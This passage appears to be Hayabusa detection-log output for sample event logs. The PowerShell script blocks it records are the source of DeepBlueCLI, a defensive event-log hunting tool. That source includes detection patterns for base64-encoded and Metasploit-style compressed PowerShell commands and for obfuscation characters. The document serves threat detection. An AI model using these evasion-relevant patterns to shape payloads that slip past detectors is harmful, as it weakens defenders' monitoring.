""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.992 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.994 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.380 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:33.354 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:09.934 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:24.665 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent 